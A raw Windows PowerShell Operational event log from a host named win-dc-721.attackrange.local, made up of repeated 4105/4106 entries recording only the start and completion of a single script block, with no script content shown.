06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470841
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470840
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470839
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470838
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470837
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470836
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470835
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470834
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470833
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470832
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470831
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470830
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470829
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470828
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470827
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470826
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470825
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470824
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470823
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470822
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470821
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470820
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470819
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470818
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470817
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470816
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470815
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470814
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470813
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470812
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470811
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470810
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470809
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470808
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470807
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470806
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470805
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470804
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470803
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470802
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470801
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470800
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470799
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470798
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470797
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470796
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470795
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470794
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470793
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470792
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470791
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470790
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470789
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470788
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470787
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
